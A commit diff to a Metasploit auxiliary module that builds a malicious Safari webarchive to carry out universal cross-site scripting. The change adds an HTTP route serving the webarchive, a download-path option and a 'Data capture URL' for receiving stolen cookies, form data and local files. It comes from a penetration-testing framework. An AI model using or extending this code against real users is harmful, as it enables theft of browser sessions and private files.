Land rapid7#1777, usability fix for Safari module

Author: Tod Beardsley

modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

@@ -50,6 +50,8 @@ def initialize(info = {})
 				OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
 				OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/']),
 				OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
+				OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
+				OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
 				OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
 				OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
 				OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@@ -143,7 +145,7 @@ def start_http(opts={})
 		}.update(opts['Uri'] || {})
 
 		proto = (datastore["SSL"] ? "https" : "http")
-		print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+		print_status("Data capture URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
 
 		if (opts['ServerHost'] == '0.0.0.0')
 			print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
@@ -153,6 +155,20 @@ def start_http(opts={})
 		@service_path = uopts['Path']
 		@http_service.add_resource(uopts['Path'], uopts)
 
+		# Add path to download
+		uopts = {
+			'Proc' => Proc.new { |cli, req|
+				resp = Rex::Proto::Http::Response::OK.new
+				resp['Content-Type'] = 'application/x-webarchive'
+				resp.body = @xml.to_s
+				cli.send_response resp
+			},
+			'Path' => webarchive_download_url
+		}.update(opts['Uri'] || {})
+		@http_service.add_resource(webarchive_download_url, uopts)
+
+		print_status("Download URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
+
 		# As long as we have the http_service object, we will keep the ftp server alive
 		while @http_service
 			select(nil, nil, nil, 1)
@@ -176,9 +192,10 @@ def on_request_uri(cli, request)
 
 	# @return [String] contents of webarchive as an XML document
 	def webarchive_xml
-		xml = webarchive_header
-		urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
-		xml << webarchive_footer
+		return @xml if not @xml.nil? # only compute xml once
+		@xml = webarchive_header
+		urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
+		@xml << webarchive_footer
 	end
 
 	# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +305,9 @@ def webarchive_footer
 	#    NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
 	#    [a encodeObject:response forKey:@"WebResourceResponse"];
 	def web_response_xml(script)
-		# this is a binary plist, but im too lazy to write a real encoder.
-		# ripped this straight out of a safari webarchive save.
+		# this is a serialized NSHTTPResponse, i'm too lazy to write a
+		#   real encoder so yay lets use string interpolation.
+		# ripped this straight out of a webarchive save
 		script['content-length'] = script[:body].length
 		whitelist = %w(content-type content-length date etag
 										Last-Modified cache-control expires)
@@ -711,7 +729,7 @@ def all_script_urls(pages)
 		end
 	end
 
-	# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
+	# @return [Array<Array<Hash>>] list of headers returned by cacheabke remote javascripts
 	def find_cached_scripts
 		cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
 			begin
@@ -780,6 +798,11 @@ def backend_url
 		"#{proto}://#{myhost}#{port_str}"
 	end
 
+	# @return [String] URL that serves the malicious webarchive
+	def webarchive_download_url
+		datastore["DOWNLOAD_PATH"]
+	end
+
 	# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
 	#   via the FILE_URLS module option.
 	def interesting_file_urls